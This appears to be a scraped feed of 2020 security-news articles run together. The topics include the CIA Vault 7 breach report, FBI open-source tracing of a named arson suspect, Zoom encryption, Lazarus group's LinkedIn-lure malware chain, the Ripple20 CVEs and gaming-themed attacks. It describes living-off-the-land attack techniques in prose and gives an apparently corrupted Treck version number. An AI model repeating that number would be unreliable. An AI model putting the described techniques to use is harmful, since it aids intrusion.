“We must care as much about securing our systems as we care about running them if we are to make the necessary revolutionary change.” -CIA’s Wikileaks Task Force.
So ends a key section of a report the U.S. Central Intelligence Agency produced in the wake of a mammoth data breach in 2016 that led to Wikileaks publishing thousands of classified documents stolen from the agency’s offensive cyber operations division. The analysis highlights a shocking series of security failures at one of the world’s most secretive entities, but the underlying weaknesses that gave rise to the breach also unfortunately are all too common in many organizations today.
The CIA produced the report in October 2017, roughly seven months after Wikileaks began publishing Vault 7 — reams of classified data detailing the CIA’s capabilities to perform electronic surveillance and cyber warfare. But the report’s contents remained shrouded from public view until earlier this week, when heavily redacted portions of it were included in a letter by Sen. Ron Wyden (D-Ore.) to the Director of National Intelligence.
The CIA acknowledged its security processes were so “woefully lax” that the agency probably would never have known about the data theft had Wikileaks not published the stolen documents online. What kind of security failures created an environment that allegedly allowed a former CIA employee to exfiltrate so much sensitive data? Here are a few, in no particular order:
Failing to rapidly detect security incidents.
Failing to act on warning signs about potentially risky employees.
Moving too slowly to enact key security safeguards.
A lack of user activity monitoring or robust server audit capability.
No effective removable media controls.
No single person empowered to ensure IT systems are built and maintained securely throughout their lifecycle.
Historical data available to all users indefinitely.
Substitute the phrase “cyber weapons” with “productivity” or just “IT systems” in the CIA’s report and you might be reading the post-mortem produced by a security firm hired to help a company recover from a highly damaging data breach.
A redacted portion of the CIA’s report on the Wikileaks breach.
DIVIDED WE STAND, UNITED WE FALL
A key phrase in the CIA’s report references deficiencies in “compartmentalizing” cybersecurity risk. At a high level (not necessarily specific to the CIA), compartmentalizing IT environments involves important concepts such as:
Segmenting one’s network so that malware infections or breaches in one part of the network can’t spill over into other areas.
Not allowing multiple users to share administrative-level passwords
Developing baselines for user and network activity so that deviations from the norm stand out more prominently.
Continuously inventorying, auditing, logging and monitoring all devices and user accounts connected to the organization’s IT network.
“The Agency for years has developed and operated IT mission systems outside the purview and governance of enterprise IT, citing the need for mission functionality and speed,” the CIA observed. “While often fulfilling a valid purpose, this ‘shadow IT’ exemplifies a broader cultural issue that separates enterprise IT from mission IT, has allowed mission system owners to determine how or if they will police themselves.”
All organizations experience intrusions, security failures and oversights of key weaknesses. In large enough enterprises, these failures likely happen multiple times each day. But by far the biggest factor that allows small intrusions to morph into a full-on data breach is a lack of ability to quickly detect and respond to security incidents.
Also, because employees tend to be the most abundant security weakness in any organization, instituting some kind of continuing security awareness training for all employees is a good idea. Some security experts I know and respect dismiss security awareness programs as a waste of time and money, observing that no matter how much training a company does, there will always be some percentage of users who will click on anything.
That may or may not be accurate, but even if it is, at least the organization then has a much better idea which employees probably need more granular security controls (i.e. more compartmentalizing) to keep them from becoming a serious security liability.
This entry was posted on Wednesday, June 17th, 2020 at 7:37 pm and is filed under A Little Sunshine, Data Breaches. You can follow any comments to this entry through the RSS 2.0 feed. You can skip to the end and leave a comment. Pinging is currently not allowed.
A woman accused of setting fire to two Philadelphia police cars during a May 30 protest was tracked down by her online buying-habits and reviews, a social media sweep, and a poor username choice, the FBI has claimed.
In an affidavit spotted by Seamus Hughes, deputy director of the Program on Extremism at George Washington University, FBI Special Agent Joseph Carpenter details the data trail that led agents to Lore-Elisabeth Blumenthal, 33.
The affidavit describes how the FBI obtained a video clip of a live news feed of the unrest in Philly that allowed investigators to get a general sense of a masked subject’s gender, race, clothing, and accessories. A subsequent video obtained from Vimeo by Homeland Security showed the alleged arson in more detail along with the masked person.
Carpenter also viewed an Instagram photo depicting the incident, a woman throwing a flaming object at a police car. The FBI then contacted the Instagram account owner who provided several relevant pictures from the scene. One of the images depicts a partial tattoo of a stylized peace sign on the woman’s right forearm.
The FBI also obtained 500 images from an amateur photographer who had documented the protest. Among them was a photo of a woman, in mask and goggles, with a similar tattoo and a T-shirt bearing the words, “KEEP THE IMMIGRANTS, DEPORT THE RACISTS.”
As Uncle Sam flies spy drones over protest-packed cities, Homeland Security asks the public if that’s a good idea
Carpenter notes that the videos and images depict the woman wearing what he and his colleagues believe are flame-retardant gloves, which in conjunction with her goggles, he argues, represent “evidence of intent and planning to engage in activities that could potentially hurt her hands and/or eyes, including arson.”
Investigators found that T-shirt for sale from a vendor on e-commerce site Etsy and spotted a user display name that had left a comment on the T-shirt sale page thanking the merchant for fast shipping. The Etsy customer’s profile page listed Philadelphia as the user’s location and an Etsy username, alleycatlore, that proved less anonymous than the message board display name because it incorporated part of her legal name.
Conducting an “open-source search” for that account name – aka googling the term – led investigators to a user of fashion site Poshmark with the display name “lore-elisabeth.” Searching for “Lore Elisabeth” in Philadelphia led to the LinkedIn account of a massage therapist under that name in the US city. The woman’s LinkedIn photo was matched against a Pennsylvania Department of Motor Vehicles photo of Lore Elisabeth Blumenthal.
Four-year-old videos on the massage therapy company website show the arm of an individual with less extensive tattoos than seen in the protest photos but apparently the same stylized peace sign in the same location.
Investigators then obtained a phone number and an address, and were able to match the shipping data from the Etsy T-shirt seller to Blumenthal’s residence.
US Attorney for the Eastern District of Pennsylvania William M. McSwain in a statement said the US Attorney’s Office supports the right to peaceful protest but that doesn’t extend to burning police cars. “Anybody who engaged in such acts can stand by to put your hands behind your back and head to federal prison,” he said. “We are coming for you.”
If convicted, Blumenthal, who was collared by the Feds and charged with arson, could face as much as a decade in prison and a fine of up to $250,000. ®
Zoom today said it will make end-to-end (E2E) encryption available to all of its users, regardless of whether they pay for it or not.
The videoconferencing overnight-sensation has walked back its initial plan to limit E2E cryptography to schools and paid-for accounts, after facing a storm of criticism for the restriction. It will, from next month, offer strong E2E encryption (E2EE) as a beta to any free account holder willing to hand over their contact number, as well as offering it to enterprise customers. We note that Google Meet and other rival services do not offer E2EE.
“Today, Zoom released an updated E2EE design on GitHub,” Zoom CEO Eric Yuan said. “We are also pleased to share that we have identified a path forward that balances the legitimate right of all users to privacy and the safety of users on our platform.
“This will enable us to offer E2EE as an advanced add-on feature for all of our users around the globe – free and paid – while maintaining the ability to prevent and fight abuse on our platform.”
It should be noted that Zoom already encrypts call in transit with AES-256-GCM cryptography, but that isn’t truly end-to-end: E2EE ensures only the meeting participants, and no one else, can encrypt and decrypt the video, voice, and other data flowing between them during a confab. Zoom points out that that this encryption won’t work on PTSN phone lines. This also excludes SIP/H.323 commercial conferencing gear.
Earlier this year, Yuan argued that Zoom couldn’t protect free calls with E2EE because to do so would thwart important law enforcement operations.
“Free users, for sure, we don’t want to give that because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose,” Yuan told analysts back in April.
Defending critical national infrastructure… hmm. Does Zoom count as critical now?
In May, Zoom asked for help from digital rights groups who, apparently, told them to stop messing about and give people encrypted calls, law enforcement concerns be damned.
“Since releasing the draft design of Zoom’s end-to-end encryption (E2EE) on May 22, we have engaged with civil liberties organizations, our CISO council, child safety advocates, encryption experts, government representatives, our own users, and others to gather their feedback on this feature,” Yuan said today.
To satisfy the legal issues and requirements, Zoom is asking users to verify their phone numbers by entering a single-use code delivered via text message. “Many leading companies perform similar steps on account creation to reduce the mass creation of abusive accounts,” Yuan said. “We are confident that by implementing risk-based authentication, in combination with our current mix of tools — including our Report a User function — we can continue to prevent and fight abuse.”
Needless to say, Zoom has taken no shortage of heat for its handling of security issues since the coronavirus lockdown made the service a household name and brought the upstart under scrutiny.
In response, Zoom moved to bring in the likes of ex-Yahoo! and Facebook CSO Alex Stamos and Luta Security and its founder Katie Mousourris to get its protections up to snuff. ®
Webcast You know your attack surface don’t you? You mapped all of it? Are you sure?
Today, 38 per cent of business workloads run in cloud environments. You may use hundreds of SaaS applications, and be connected to subsidiaries and partner networks. Your business has been kept on track in the past month by remote workers, the cloud, and your partners. Now their vulnerabilities are your problem, because those are exactly the routes into your organisation that an attacker will target and exploit.
But how can you map the entire attack surface and prioritise the most important vulnerabilities, when statistics show you are only aware of 70 per cent of it at best, and tools like port scanners pump out lists of IP addresses without any business context or prioritisation?
Join our webcast on June 18 at 1000 PDT (1300 EDT) where Rob Gurzeev, CEO of CyCognito, explains to The Reg‘s Tim Phillips how CISOs can:
Discover and map their entire attack surface, including subsidiaries and partner IT
Find the hidden “shadow risks” that smart hackers exploit
Link attack vectors to business context to prioritize the most important actions
Manage the organization’s security posture by thinking like an attacker
Sign up here for the webcast, brought to you by CyCognito, and join us tomorrow.
Security experts at Intego are warning Apple Mac users of a new in-the-wild malware threat, which masquerades as an installer for Adobe Flash Player.
The malware, which Intego says appears to be a variant of OSX/Shlayer and OSX/Bundlore, was found hiding on webpages after searching Google for the “exact titles of YouTube videos”:
While searching Google for the exact titles of YouTube videos, Intego’s research team encountered Google search results that, when clicked, pass through multiple redirection sites and end up on a page that claims the visitor’s Flash Player is out of date, and displays deceptive warnings and fake dialog boxes to entice the victim to download a supposed Flash Player updater—which is, in fact, a Trojan horse.
Using the disguise of an Adobe Flash Player update is hardly new for malware, even on Apple Macs, but what is more unusual is how the malware attempts to hide its activities from both the computer user and security software.
According to Intego’s chief security analyst Joshua Long, the bogus Flash installer app is in reality a bash shell script.
The malicious script spews out a password-protected .ZIP archive file, containing a malicious app that is installed in a hidden temporary folder. This app, in turn, downloads a legitimate installer for Flash Player digitally-signed by Adobe in an attempt to not arouse suspicion.
However, the malicious app also has the ability to download further malware and adware from command-and-control servers operated by whoever is orchestrating the attack.
Frankly, in the year 2020, you probably shouldn’t be installing any versions of Flash on your computer – whether they be legitimate or bogus. There are virtually no sites that still rely upon Flash, and even Adobe is keen for you to forget all about it.
Stop making life easy for cybercriminals. Ensure that you don’t have Adobe Flash lingering on any of your computers, and then you’ll know for certain that any prompts to update it can only be malicious. 🙂
And, of course, all Mac users should be running an up-to-date anti-virus program, and exercising caution about the software they install onto their computers.
Former British MP Emma Dent Coad was not very happy to hear from the NHS Wales Test and Trace service today. Not because the SMS text message she received told her that she had tested positive for the Covid-19 Coronavirus (it didn’t, and she hasn’t).
But rather because the SMS clearly was meant to go to someone else entirely.
On Twitter, the former Kensington MP didn’t hold back, expressing her concern that the SMS notification from NHS Wales of a negative test result had not only been clearly sent to the wrong phone number, but also that there was no obvious way to inform the service of the error.
Who the hell’s in charge of NHS text notifications?
NHS WALES has just informed me, in English and Welsh, that xxx (not me) has tested negative for CV19.
I’m delighted for xxx, but 1, WTAF, and 2, there is no way to respond!
In a screenshot shared on Twitter, Dent Coad – who is still a Labour councillor – revealed that the message exposed the patient’s name and full date of birth.
I suspect what’s happened here is simple human error. Either the person being tested doesn’t know their own mobile phone number (hey, don’t laugh. I don’t know my phone number. After all, why would I ever ring it?) or it was entered incorrectly by whoever registered the patient for the Coronavirus test.
It’s easy to imagine, for instance, that a couple of numbers may have been accidentally transposed.
The likelihood of an error like this occuring could perhaps be lessened by simply double-checking, or even sending a confirmation text to the number a patient has registered with the service, but… I guess these systems have been built in something of a hurry.
The worry is, of course, that some people are not going to receive information about their test status (positive or negative). At best that could be inconvenient and maybe a leak of personal information, but at worst it could increase the chances of the Coronavirus being spread to others.
Cybersecurity researchers today took the wraps off a new sophisticated cyber-espionage campaign directed against aerospace and military organizations in Europe and the Middle East with an aim to spy on key employees of the targeted firms and, in some case, even to siphon money.
The campaign, dubbed “Operation In(ter)ception” because of a reference to “Inception” in the malware sample, took place between September to December 2019, according to a new report cybersecurity firm ESET shared with The Hacker News.
“The primary goal of the operation was espionage,” the researchers told The Hacker News. “However, in one of the cases we investigated, the attackers tried to monetize access to a victim’s email account through a business email compromise (BEC) attack as the final stage of the operation.”
The financial motivation behind the attacks, coupled with similarities in targeting and development environment, have led ESET to suspect Lazarus Group, a notorious hacking group that’s been attributed to working on behalf of the North Korean government to fund the country’s illicit weapon and missile programs.
Social Engineering via LinkedIn
Stating that the campaign was highly targeted, ESET said it relied on social engineering tricks to lure employees working for the chosen companies with fake job offers using LinkedIn’s messaging feature, posing as HR managers of well-known companies in the aerospace and defense industry, including Collins Aerospace and General Dynamics.
“Once the contact was established, the attackers snuck malicious files into the communication, disguising them as documents related to the advertised job offer,” the researchers said, based on an investigation with two of the affected European companies.
The decoy RAR archive files, which were directly sent over the chats or as emails sent from their fake LinkedIn personas pointing to an OneDrive link, purported to contain a PDF document detailing salary information of specific job positions, when in actuality, it executed Windows’ Command Prompt utility to perform a series of actions:
Copy Windows Management Instrumentation command-line tool (wmic.exe) to a specific folder
Rename it to something innocuous to evade detection (e.g., Intel, NVidia, Skype, OneDrive and Mozilla), and
Create scheduled tasks that execute a remote XSL script via WMIC.
The actors behind the operation, upon gaining an initial foothold inside the target company, went on to employ a custom malware downloader, which in turn downloaded a previously undocumented second-stage payload — a C++ backdoor that periodically sends requests to an attacker-controlled server, carry out pre-defined actions based on the received commands, and exfiltrate the collected information as a RAR file via a modified version of dbxcli, an open-source command-line client for Dropbox. In addition to using WMIC to interpret remote XSL scripts, the adversaries also abused native Windows utilities such as “certutil” to decode base64-encoded downloaded payloads, and “rundll32” and “regsvr32” to run their custom malware.
“We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don’t wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies,” Paul Rockwell, Head of Trust and Safety at LinkedIn said in a statement sent to The Hacker News.
“Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors. We enforce our policies, which are very clear: the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service. In this case, we uncovered instances of abuse that involved the creation of fake accounts. We took immediate action at that time and permanently restricted the accounts”
Financially Motivated BEC Attacks
Besides reconnaissance, ESET researchers also found evidence of attackers attempting to exploit the compromised accounts to extract money from other companies.
Although unsuccessful, the monetization tactic worked by using the existing email communications between the account holder and a customer of the company to settle an outstanding invoice to a different bank account under their control.
“As part of this ruse, the attackers registered an identical domain name to that of the compromised company, but on a different top-level domain, and used an email associated with this fake domain for further communication with the targeted customer,” ESET said.
Ultimately, the targeted customer reached out to the correct email address of the victim about the suspicious emails, thus foiling the attackers’ attempt.
“Our research into Operation In(ter)ception shows again how effective spear-phishing can be for compromising a target of interest,” the researchers concluded.
“They were highly targeted and relied on social engineering over LinkedIn and custom, multistage malware. To operate under the radar, the attackers frequently recompiled their malware, abused native Windows utilities, and impersonated legitimate software and companies.”
The Department of Homeland Security and CISA ICS-CERT today issued a critical security advisory warning about over a dozen newly discovered vulnerabilities affecting billions of Internet-connected devices manufactured by many vendors across the globe.
Dubbed “Ripple20,” the set of 19 vulnerabilities resides in a low-level TCP/IP software library developed by Treck, which, if weaponized, could let remote attackers gain complete control over targeted devices—without requiring any user interaction.
According to Israeli cybersecurity company JSOF—who discovered these flaws—the affected devices are in use across various industries, ranging from home/consumer devices to medical, healthcare, data centers, enterprises, telecom, oil, gas, nuclear, transportation, and many others across critical infrastructure.
“Just a few examples: data could be stolen off of a printer, an infusion pump behavior changed, or industrial control devices could be made to malfunction. An attacker could hide malicious code within embedded devices for years,” the researchers said in a report shared with The Hacker News.
“One of the vulnerabilities could enable entry from outside into the network boundaries; this is only a small taste of the potential risks.”
There are four critical vulnerabilities in Treck TCP/IP stack, with CVSS scores over 9, which could let attackers execute arbitrary code on targeted devices remotely, and one critical bug affects the DNS protocol.
“The other 15 vulnerabilities are in ranging degrees of severity with CVSS score ranging from 3.1 to 8.2, and effects ranging from Denial of Service to potential Remote Code Execution,” the report says.
Some Ripple20 flaws were patched by Treck or device manufacturers over the years due to code changes and Stack configurability, and for the same reason, many of the flaws also have several variants that apparently would not be patched anytime soon until vendors perform a comprehensive risk assessment.
CVE-2020-11896 (CVSS v3 base score 10.0): Improper handling of length parameter inconsistency in IPv4/UDP component when handling a packet sent by an unauthorized network attacker. This vulnerability may result in remote code execution.
CVE-2020-11897 (CVSS v3 base score 10.0): Improper handling of length parameter inconsistency in IPv6 component when handling a packet sent by an unauthorized network attacker. This vulnerability may result in possible out-of-bounds write.
CVE-2020-11898 (CVSS v3 base score 9.8): Improper handling of length parameter inconsistency in IPv4/ICMPv4 component when handling a packet sent by an unauthorized network attacker. This vulnerability may result in the exposure of sensitive information.
CVE-2020-11899 (CVSS v3 base score 9.8): Improper input validation in the IPv6 component when handling a packet sent by an unauthorized network attacker. This vulnerability may allow exposure of sensitive information.
CVE-2020-11900 (CVSS v3 base score of 9.3): Possible double free in IPv4 tunneling component when handling a packet sent by a network attacker. This vulnerability may result in remote code execution.
CVE-2020-11901 (CVSS v3 base score 9.0): Improper input validation in the DNS resolver component when handling a packet sent by an unauthorized network attacker. This vulnerability may result in remote code execution.
You can find details for the rest of the vulnerabilities in an advisory released by the U.S. government.
Cybersecurity researchers at JSOF responsibly reported their findings to Treck company, who then patched most of the flaws with the release of TCP/IP stack version 220.127.116.11 or higher.
Researchers also contacted affected semiconductors and device manufacturing vendors, including—HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, Baxter, and Quadros—many of which have already acknowledged the flaw and rest are still taking an assessment of their products before going public.
“The disclosure was postponed twice after requests for more time came from some of the participating vendors, with some of the vendors voicing COVID-19-related delays. Out of consideration for these companies, the time period was extended from 90 to over 120 days. Even so, some of the participating companies became difficult to deal with, as they made extra demands, and some, from our perspective, seemed much more concerned with their brand’s image than with patching on the vulnerabilities,” the researchers said.
Since millions of devices would not receive security patch updates to address Ripple20 vulnerabilities anytime soon, researchers and ICS-CERT have recommended consumers and organization to:
Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls and isolate them from the business network.
Besides this, it’s also advised to use virtual private networks for securely connecting your devices to Cloud-based services over the Internet.
In its advisory, CISA has also asked affected organizations to perform proper impact analysis and risk assessment before deploying defensive measures.
The Incident Response (IR) services market is in accelerated growth due to the rise in cyberattacks that result in breaches. More and more organizations, across all sizes and verticals, choose to outsource IR to 3rd party service providers over handling security incidents in-house.
Cynet is now launching a first-of-its-kind offering, enabling any Managed Security Provider (MSP) or Security Integrator (SI) to add Incident Response to its services portfolio, without building an in-house team of incident responders, by using Cynet’s IR team and technology at no cost.
Managed Service providers interested to add Incident Response to their service portfolio with no investment in people or technology can apply here.
As cyber threats grow in sophistication and volume, there is an increasing number of cases in which attackers succeed in compromising the environments they target. This, in turn, fuels a rapidly growing demand for IR technologies and services.
Since in most cases the response to a suspected attack requires skills in fields such as forensics, reverse engineering and other investigation skills that are not part of the standard IT workforce’s expertise, many organizations prefer to put their trust in a professional 3rd party that specializes in providing IR services.
However, while the demand for IR services is high, only a small part of MSPs and SIs provide IR services. All others that provide standard IT and security services such as deployment, integration, and management, don’t offer IR services due to the difficulties in recruiting a team of skilled responders.
Cynet now launches a new offering, enabling existing IT and security service providers to add IR to their offered services cart without having their own in-house team of security experts.
With this offering, the service providers can sell IR services to their customers, and when an incident occurs, engage the Cynet CyOps security team, who install the Cynet 360 platform across the customer environment within minutes, and conduct a rapid and efficient investigation and response, until the environment is clean again.
On top of the explicit benefit of adding IR services to its offering with zero investment, after the incident response process is over, MSPs and SIs have the option to leverage the momentum of having Cynet 360 already deployed and working on the customer environment to showcase the full value proposition of the platform and sell the Cynet 360 breach protection platform on a yearly subscription base.
CyOps is a team of handpicked security analysts and threat researchers that respond to events on a daily basis through Cynet’s Security Operations Center.
CyOps’ vast cybersecurity experience warrants rapid and efficient operation across environments of all types and sizes.
About Cynet 360:
CyOps uses Cynet 360 Autonomous Breach Protection as their default IR platform when engaging with an environment under attack.
Cynet 360 instantly collects and correlates all the endpoint, network and user data from the environment, enabling CyOps to pinpoint suspicious entities and connections, investigate to unveil root-cause, scope, and impact, and remove malicious presence and activity.
These responders’ expertise and Cynet 360’s cutting-edge IR technology magnify one another, to deliver IR with unmatched quality and efficiency.
Threat intel researchers have uncovered a phishing and malware campaign that targeted “a large European aerospace company” and which was run by the same North Koreans behind the hack of Sony Pictures.
While there are quite a few European aerospace firms, Slovakian infosec biz ESET was more concerned with the phishing ‘n’ malware campaign it detected on behalf of its unnamed client.
Branded “Operation Interception” by ESET, the researchers claimed the “highly targeted cyberattacks” were being spread by North Korean baddies Lazarus Group, who were behind the 2014 hack of Sony’s American entertainment business.
The threat group’s latest detected campaign involved targeting aerospace folk via LinkedIn, said the infoseccers. ESET researcher Jean-Ian Boutin explained: “In our case they were impersonating Collins Aerospace and General Dynamics (GD), two organisations in the same vertical as the targeted European organisations,”. He said the Norks were targeting people who worked in “sales, marketing, tech, general admin” roles.
Collins and GD are two of the bigger names in North American aerospace; among other things, Collins makes avionic instruments and software while GD has fingers in pies ranging from the F-16 fighter jet through Gulfstream corporate aircraft, US Navy submarines and armoured vehicles. As bait dangled before honest people hoping to take a major step forwards in an aerospace career, these two companies were tempting lures.
“The [job] offer seemed too good to be true,” said Boutin as he explained the Lazarus ruse to The Reg. “Maybe [the recipient’s] career could take off in a big way?”
Once into a target’s network the criminals would try to brute-force any Active Directory admin accounts they could find, as well as exfiltrate data by bundling it into a RAR archive and trying to upload it to a Dropbox account.
After the victim had been suitably reeled in, Lazarus would try to induce them to download a password-protected RAR archive “containing a LNK file.” Once clicked, that LNK file appeared to the victim to download a PDF containing job information. In the background, however, it also downloaded a malicious EXE that created a bunch of folders and set a Windows scheduled task to run a remote script every so often.
ESET illustration showing the Lazarus Group attack progression
The attackers were most insistent that the victim only respond to their job offer on a Windows machine running Internet Explorer. Once in, they resorted to PowerShell – taking advantage of the fact that “the logging of executed PowerShell commands is disabled by default,” although evidence was found that the Lazarus crew went through the connected domain to enumerate all Active Directory accounts before trying to brute-force their way into admin accounts.
To avoid Windows security features blocking their malware, Lazarus also signed their code using a certificate first issued to 16:20 Software LLC, an American firm said by ESET to have been incorporated in May 2010.
Among other clues linking the malware’s components back to North Korea, Boutin said his team had seen build timestamps “added by the compiler showing when the executable was compiled” which neatly cross-referenced with normal office hours for East Asia. Corroborating that were some “host fingerprinting” techniques which uncovered various digital fragments “similar to backdoors the Lazarus Group is known to use,” as Boutin put it.
What made the lure so sneaky was the fact it was targeting potential jobseekers looking to leave their current employer, a fact that Boutin speculated may have made some victims less likely to report it to their current employer’s cybersecurity teams.
Thanks to the coronavirus pandemic, the role of the Internet in our lives has undergone changes, including irreversible ones. Some of these changes are definitely for the better, some are not very good, but almost all of them in some way affect digital security issues.
We decided to take a closer look at the changes around us through the prism of information security, starting with the video game industry.
The daily number of blocked attempts to visit malicious gaming-related websites, or browse to such sites from gaming-related websites (or forums), increased by 54% in Aprilcompared to January of this year. In May, we saw a downward trend in this indicator: -18% compared to April.
The number of blocked attempts to visit phishing sites that exploit online gaming topics has increased. In particular, the number of notifications from fake Steam gaming platform sites increased by 40% from February to April.
Attackers use Minecraft, Counter-Strike: Global Offensive and The Witcher 3: Wild Hunt most often.
The users most targeted by such attacks are from Vietnam (7.9%), Algeria (6.6%), Korea (6.2%), Hungary (6.2%) and Romania (6%)
I play until the boss sees
Figures from various sources show that the pandemic has led to a sharp increase in player activity. In March, according to gamesindustry.biz, sales of games, both computer and console, increased significantly.
Growth in game sales in the week of March 16-22. Source: gamesindustry.biz (download)
In April, the number of downloads, as well as the number of simultaneous online players, of Steam reached record levels. The Steam user activity graph (both in-game and just installing the client) (Steam Database) shows the peak of activity on April 4. After that, activity started to reduce, but only slowly. Moreover, the activity graphs of the players are noticeably different from the usual ones – periods of inactivity are less pronounced than in ordinary pre-quarantine days, and the peaks last longer.
The number of Steam users per day. Source: steamdb.info
All these stats are totally understandable. First, people have more free time for games. Statistics collected by Nielsen Games as part of their regular survey of gamers confirms this thesis:
The increase in the amount of time spent playing video games by players in different countries. Source: Hollywood Reporter (download)
Second, apparently not all people who wanted to spend time playing video games had a computer at home that would let them do it. That’s what you can figure out checking out the hardware statistics displayed on the Steam site.
If you look closely at the graphics containing information on the video cards used by Steam users, you can see a clear change in graphics cards, which were completely flat before, occurring in March 2020. Until now, the proportions of Nvidia, Intel and AMD video cards have remained at the same level relative to each other. Since the beginning of quarantine, the share of Intel and AMD video cards has grown quite noticeably. This growth was within 2%, which might seem insignificant, until you remember that there are more than 20 million Steam users. That is, the additional number of devices with Intel and AMD graphics cards amounted to hundreds of thousands of computers. Given the specifics of video cards from different manufacturers, we can safely assume that these hundreds of thousands of devices are office laptops that arrived at home during quarantine and that people installed Steam while the boss wasn’t able to see it anyway.
This is also confirmed by the sudden in the graphs showing the ratio of Intel and AMD processors (Intel also grew from the beginning of quarantine); and the processors used by players in terms of the number of cores (atypical growth in this proportion was shown by 4-core and 2-core processors) :
Let’s play with the bad guys?
The increase in the number of players and the time they spend in games, of course, did not go unnoticed by cybercriminals. Gamers have long been the target of attacks by bad guys, who are mainly interested in logins and passwords for game accounts. Now, with the connection of work computers to home networks, and, conversely, with the entry of home devices into work networks that are often poorly prepared for this, attacks on players are becoming not only a way to get to an individual user’s wallet, but also a way to access the corporate infrastructure.
In the first five months of 2020, the number of vulnerabilities discovered on Steam has already exceeded the number of vulnerabilities discovered in any of the previous years. This fact, among other things, indicates a growing interest in finding such vulnerabilities.
We shouldn’t forget also that at the end of April 2020, Valve confirmed the leak of the source code of the popular network games CS: GO and Team Fortress 2. Attackers are most probably already trying to parse their code in search of vulnerabilities that can be used for their own purposes. It is important to understand that these are not offline games, but online games that need a constant connection to game servers and frequent updates. This makes their users even more vulnerable, because their devices are obviously always online, and players are always ready to install an “update” so as not to lose the ability to play.
But even without technically complex attacks using zero-day vulnerabilities, attackers have a large field for their activities. Realizing that the gaming industry is experiencing an unexpected increase in the number of players, they have “increased power” in the field of attacks that exploit the gaming theme in one way or another.
The logical step on the part of the attackers was to increase the number of phishing attacks. This is confirmed by Kaspersky AntiPhishing and the Kaspersky Security Network (KSN). By comparison with February, the number of hits on the thousand most popular phishing sites containing the word “Steam” in the name has significantly increased. Such triggering peaked in April.
An increase in the number of hits on phishing Steam-related topics relative to February 2020. Source: Kaspersky Security Network (download)
There is a clear increase in the statistics of web antivirus detections of sites with names exploiting the game theme as a whole, for example, containing the names of popular video games and gaming platforms.
The number of web attacks using game subjects during the period from January to May 2020. Source: KSN (download)
A wide variety of malicious programs are spread with such malicious links: from password stealing malware to ransomware and miners. As always, they fake free versions, updates or extensions for popular games, as well as cheat programs. A similar picture is observed among malicious files that use game-related names to stay unnoticed.
Local threats that use game-related themes as a cover
% of all attacks
HEUR: Trojan.Multi.StartPage. b
The statistics do not take into account the Hacktool category of threats – tools that are usually installed by the users themselves but can be used for malicious purposes. We include remote access clients, traffic analyzers, etc. in this category. This category is of interest here because modern cheat programs often use the same techniques as malware, such as memory injection and exploiting vulnerabilities to bypass protection. If we add this kind of detection to the statistics, it will take first place with a share of 10%.
Judging by the statistics obtained from our web antivirus, the attackers focus the most on Minecraft usage. The Witcher 3: Wild Hunt also hits the TOP 3 of the most exploited games, the popularity of which has grown sharply thanks to the series based on the novels by Andrzej Sapkowski.
The number of attacks using the theme of an online game, January-May 2020. Source: KSN (download)
Following the dynamics of the responses to the links containing the names of the games, we came to the conclusion that from April to early May, the attackers conducted a campaign in which they used several games at once. In particular, Overwatch and Players Unknown Battlegrounds came into the view of our radar. If you look closely at the graph, you can see many parallel peaks. Before and after the indicated period, this trend does not persist.
Web attacks using the themes of Overwatch and PUBG, January-May 2020. Source: KSN (download)
Users in Vietnam are most susceptible to attacks using game-related topics: almost 8% of all web antivirus detections in this country occurred on sites whose names used the theme of games.
TOP 20 countries by the proportion of blocked attempts to enter malicious sites using the theme of online games, January-May 2020. Source: KSN
Percentage of attacked users
Following Vietnam, the TOP 5 countries for this parameter include Algeria, Korea, Hungary and Romania. In general, the TOP 20 includes many countries in North Africa, Asia and Europe, especially Southern and Eastern Europe.
Tens of millions of people who find themselves isolated at home (combined with plenty of free time) have given a serious boost to the gaming industry. Of course, the attackers could not help but take advantage of this situation and we have seen an impressive increase in attempts to switch to phishing sites that exploit gaming topics.
However, we should keep in mind that this was facilitated not only by the efforts of attackers, but also by the careless actions of the users themselves, who fell for fake emails apparently sent on behalf of game services, or who were looking for hacked versions of some popular games and cheat programs for others.
Unfortunately, in most cases, cybercriminals do not need technologically sophisticated schemes to carry out successful attacks. It is enough to use relevant topics, one of which in the spring of 2020 was video games.
Infosec pros and hackers regularly abuse cloud service providers to conduct reconnaissance and attacks, despite efforts by cloud providers to limit such activity.
In a recent research paper titled “Cloud as an Attack Platform” [PDF], five boffins from Texas Tech University – Moitrayee Chatterjee, Prerit Datta, Faranak Abri, Akbar Siami-Namin, and Keith Jones – describe a series of interviews they conducted with computer security pros attending the Black Hat and DEF CON conferences.
Of the 75 security professionals and hackers they spoke with as a part of a larger examination of attacker psychology, more than 93 per cent admitted to abusing cloud services to create attack environments and launch attacks.
“We observed that these professional hackers often employ common strategies to abuse the cloud platform for its resource-efficient features in order to remain stealthy and silent while probing target machines, collecting victim data, discovering vulnerabilities, and launching attacks,” the paper explains.
“We did not collect any demographic data, so we can not tell apart an ethical hacker/pen-tester or malicious hackers,” said Chatterjee, a doctoral candidate and corresponding author, in an email to The Register. “Moreover, at conferences like DEF CON, participants do not get a name tag, we all got a tag that says ‘human.'”
Chatterjee said recruiting participants to answer questions was difficult because they were afraid of being subject to a social engineering attack. “Some of them even thought we were stealing biometric data when offered them a pen to scribble down their thoughts using some diagram,” she said.
Those using cloud services for offensive operations, the researchers say, have a common pattern. They set up a Virtual Private Server (VPS) or a multi-hop Virtual Private Network (VPN) to communicate securely with virtual machines (VMs) and load them with the cybersecurity tools like NMap, Metasploit, and Wireshark so they can conduct offensive operations.
Though infrastructure-as-a-service providers try to avoid this through VM network quotas, or tools to secure accounts like AWS GuardDuty and Amazon Inspector, infosec pros can work around platform limitations.
Chatterjee said the interviewees mostly mentioned AWS, but added that Google Cloud Platform abuse has been documented too. These companies, she said, are aware that abuse happens but they don’t sufficiently monitor basic accounts to stop it.
The Register asked AWS and Google for comment. A Google spokesperson pointed to the company’s acceptable use policy for GCP. AWS did not respond but has a similar policy.
Staying under the radar
